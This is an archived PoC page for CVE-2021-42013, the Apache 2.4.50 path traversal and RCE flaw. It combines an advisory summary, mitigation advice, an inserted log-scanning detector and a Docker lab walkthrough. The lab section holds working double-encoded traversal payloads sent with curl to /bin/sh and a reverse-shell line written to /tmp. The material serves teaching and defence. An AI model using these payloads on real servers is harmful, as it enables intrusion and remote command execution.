Related vulnerability
Title:
Apache HTTP Server security vulnerability
(CVE-2021-42013)
Description: Apache HTTP Server is an open-source web server from the Apache Software Foundation (USA). It is fast, reliable and extensible through a simple API. Apache HTTP Server has a security vulnerability that stems from the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 being insufficient. An attacker can use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If, in addition, these alias
Description
CVE-2021-42013, a critical vulnerability in the Apache HTTP Server (2.4.50)
Introduction
# CVE-2021-42013: Apache HTTP Server Path Traversal and Remote Code Execution Vulnerability
## Overview
This repository provides information and resources related to CVE-2021-42013, a critical vulnerability in the Apache HTTP Server (version 2.4.50). The vulnerability allows path traversal and remote code execution (RCE) through a crafted URL path, enabling attackers to access and execute files outside the server's document root.
## Details
- CVE Identifier: CVE-2021-42013
- Severity: Critical
- Affected Versions: Apache HTTP Server 2.4.50
- Fixed Version: Apache HTTP Server 2.4.51 or later
## Description
CVE-2021-42013 is a vulnerability resulting from an incomplete fix for CVE-2021-41773. This flaw permits attackers to perform path traversal and potentially execute arbitrary code on the server. Exploitation of this vulnerability can lead to significant security breaches, including unauthorized access to sensitive data and full system compromise.
## Impact
Successful exploitation of CVE-2021-42013 can result in:
1. Unauthorized File Access: Attackers can access files outside the server’s document root, including sensitive system files, configuration files, and other protected resources. This could lead to the exposure of critical information, such as credentials, internal configurations, and other sensitive data.
2. Remote Code Execution: By accessing and executing arbitrary files, attackers can potentially run malicious scripts or binaries on the server. This could allow them to take control of the server, install malware, create backdoors, and manipulate server operations.
3. Service Disruption: Unauthorized access and execution of commands can disrupt normal server operations, leading to downtime, performance degradation, and denial of service (DoS) conditions. This impacts the availability and reliability of the services hosted on the server.
4. Privilege Escalation: In cases where the server runs with elevated privileges, an attacker exploiting this vulnerability could gain administrative access, allowing them to perform further malicious activities and escalate their control over the server environment.
5. Data Integrity Compromise: Attackers could modify or delete critical files, compromising the integrity of the data hosted on the server. This includes altering website content, defacing web pages, or tampering with application data.
## Mitigation
To protect your server from CVE-2021-42013, it is crucial to:
1. Update Apache HTTP Server: Upgrade to version 2.4.51 or later, where this vulnerability has been addressed.
2. Restrict Access: Ensure proper server configuration to restrict access to only necessary files and directories, reducing the risk of path traversal attacks.
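Beyond patching, a defender wants to recognise this traversal form in the server's logs. The following Python script is an added example, not code from this repository or from the Apache project: it parses constructed Apache access-log lines, percent-decodes each request path repeatedly until it stops changing (one pass turns `.%%32%65` into `.%2e`, and only the second pass yields `..`, which is the encoding trick behind this CVE), then walks the decoded segments to see whether `..` ever climbs above the document root. The log lines and IP addresses in `SAMPLE_LOG` are made up for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample Apache access-log lines for this example (not from the page).
# Lines 2 and 3 use the double-encoded ".%%32%65" form of ".." discussed in the
# README, line 4 is single-encoded, lines 1 and 5 are benign.
SAMPLE_LOG = """\
172.17.0.1 - - [10/Oct/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 45
172.17.0.1 - - [10/Oct/2021:12:00:02 +0000] "GET /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd HTTP/1.1" 200 1042
172.17.0.1 - - [10/Oct/2021:12:00:03 +0000] "POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1" 200 81
172.17.0.1 - - [10/Oct/2021:12:00:04 +0000] "GET /icons/..%2f..%2fetc/passwd HTTP/1.1" 403 196
172.17.0.1 - - [10/Oct/2021:12:00:05 +0000] "GET /docs/a..b/readme.txt HTTP/1.1" 200 12
"""

# Request line inside the Apache "combined" log format: "METHOD PATH PROTO"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')


def decode_path(path: str, max_rounds: int = 3) -> str:
    """Percent-decode repeatedly until the result stops changing.

    A single decode turns '.%%32%65' into '.%2e'; only the second round
    yields '..', which is why a one-pass normalisation misses this pattern.
    """
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def escapes_root(path: str) -> bool:
    """Walk the path segments and report whether '..' ever climbs above '/'."""
    depth = 0
    for segment in path.split("?", 1)[0].split("/"):
        if segment == "..":
            depth -= 1
            if depth < 0:
                return True
        elif segment not in ("", "."):
            depth += 1
    return False


def classify_request(raw_path: str) -> dict:
    """Describe one request path: fully decoded form, encoding depth, traversal."""
    once = unquote(raw_path)
    full = decode_path(raw_path)
    return {
        "raw": raw_path,
        "decoded": full,
        "double_encoded": once != full,  # needed more than one decode round
        "traversal": escapes_root(full),
    }


def scan_log(text: str) -> list:
    """Return one finding per log line whose decoded request path escapes the root."""
    findings = []
    for line in text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        info = classify_request(match.group("path"))
        if info["traversal"]:
            info["method"] = match.group("method")
            findings.append(info)
    return findings


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        tag = "double-encoded" if hit["double_encoded"] else "encoded"
        print(f"{hit['method']} {hit['raw']}  ->  {hit['decoded']}  [{tag} traversal]")
```

Run against the sample, the script flags the two double-encoded `cgi-bin` requests and the single-encoded `icons` request, while leaving `/docs/a..b/readme.txt` alone because `..` inside a segment is not a parent reference. The same segment walk is the check the server-side configuration should enforce: the `Require all denied` default on the filesystem root that the description above mentions is what stops a decoded `..` from reaching anything outside the aliased directories.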
## Simulation
Now, how about we do the simulation? Before we start, you need Docker Engine installed. The installation is simple; the official guide is [here](https://docs.docker.com/engine/install/). We use Docker for the lab so that the exploitation simulation runs in an isolated environment and stays within ethical hacking practice. Enough talk, let's start!
### Usage
1. Clone this repository
Use git to clone the repository:
```
git clone https://github.com/rafifdna/CVE-2021-42013.git
```
Change into the cloned directory:
```
cd CVE-2021-42013
```
2. Prepare Lab
First, build the image from the Dockerfile with the command below. The Dockerfiles live in the `apache/path-traversal` and `apache/rce` subdirectories (see the file snapshot), so pass the one you want as the build context:
```
# RCE lab; use apache/path-traversal instead for the traversal-only lab
docker build -t apache-lab -f apache/rce/dockerfile apache/rce
```
Then, after the image is built, run it with the command below (host port 888 is mapped to port 80 inside the container):
```
docker run -dit -p 888:80 apache-lab
```
3. Verify Lab (Optional)
You can also check the docker to make sure the lab is running.
```
docker ps
```
```
docker logs <container-id>
```
Make sure the web server is running; you can curl it to see the output.
```
# the published port 888 is on the Docker host; the container itself (172.17.0.2 by default) listens on port 80
curl http://localhost:888
```
4. Execution
Install the Python requirements:
```
pip install -r requirements.txt
```
You can use the exploit.py script to check whether the targeted website is vulnerable before continuing with the execution. The script covers both path traversal and remote code execution (RCE).
```
python3 exploit.py -u http://172.17.0.2
```
Next, check with curl whether commands can be run through the CGI handler (the host and port match the `docker run` mapping above):
```
curl 'http://localhost:888/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; uname -a'
```
```
curl 'http://localhost:888/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; ls'
```
## Exploitation
1. Remote Code Execution
Using Reverse Shell With Netcat
```
curl 'http://localhost:888/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; echo "#!/bin/bash" > /tmp/lab.sh'
```
```
curl 'http://localhost:888/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; echo "bash -i >& /dev/tcp/127.0.0.1/221 0>&1" >> /tmp/lab.sh'
```
```
curl 'http://localhost:888/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; cat /tmp/lab.sh'
```
Using Metasploit
### References
[CVE-2021-42013 Details](https://nvd.nist.gov/vuln/detail/CVE-2021-42013)
File snapshot
[4.0K] /data/pocs/792f84f828cc6119caae28bfa60c05aa91301a59
├── [4.0K] apache
│ ├── [4.0K] path-traversal
│ │ ├── [ 68] dockerfile
│ │ └── [ 0] httpd.conf
│ └── [4.0K] rce
│ ├── [ 68] dockerfile
│ └── [ 20K] httpd.conf
├── [5.2K] exploit.py
├── [1.0K] LICENSE.md
├── [5.2K] README.md
└── [ 16] requirements.txt
3 directories, 8 files
Remarks
1. It is recommended to access the PoC through its original source first.
2. If the source is gone or unreachable, send an e-mail to f.jinxu#gmail.com to request a local snapshot (replace # with @).
3. Shenlong has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.